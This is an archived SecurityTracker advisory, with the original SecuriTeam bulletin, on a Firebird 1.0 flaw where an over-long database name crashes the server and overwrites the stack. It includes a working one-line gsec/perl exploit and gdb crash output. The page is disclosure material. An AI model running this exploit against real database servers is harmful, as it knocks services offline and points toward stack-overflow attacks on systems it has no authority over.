SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Firebird Vendors:   firebird.sourceforge.net
Firebird Database Can Be Crashed By Remote Users With Specially Crafted Database Name
SecurityTracker Alert ID:  1010354
SecurityTracker URL:  http://securitytracker.com/id/1010354
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jun 3 2004
Original Entry Date:  Jun 1 2004
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in the Firebird database in the processing of database names. A remote user can cause the target server to crash.

SecuriTeam reported that a remote user can connect to the database and send a specially crafted database name to cause the target database service to crash.

A demonstration exploit is provided:

gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

Noam Rathaus of SecuriTeam is credited with discovering this flaw.

Impact:   A remote user can cause the database service to crash.
Solution:   The report indicates that version 1.5.0 is not vulnerable.
Vendor URL:  firebird.sourceforge.net/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Firebird Database Remote Database Name Overflow


 Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html


SUMMARY

<http://firebird.sourceforge.net> Firebird is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix 
platforms. Firebird offers excellent concurrency, high performance, and 
powerful language support for stored procedures and triggers. It has been 
used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names, allows 
an unauthenticated user to cause the server to crash, and overwrite critical 
section of the stack used by the database.

DETAILS

Vulnerable Systems:
* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
* Firebird Database version 1.5.0 (others are presumed to be immune as well)


By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever 
-password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is 
free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of it 
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for 
details.
This GDB was configured as "i386-linux"...(no debugging symbols 
found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is 
recommended that you use a source code based installation.


ADDITIONAL INFORMATION

The information has been provided by <mailto:expert@securiteam.com> Noam 
Rathaus.


Regards, 
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf




==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC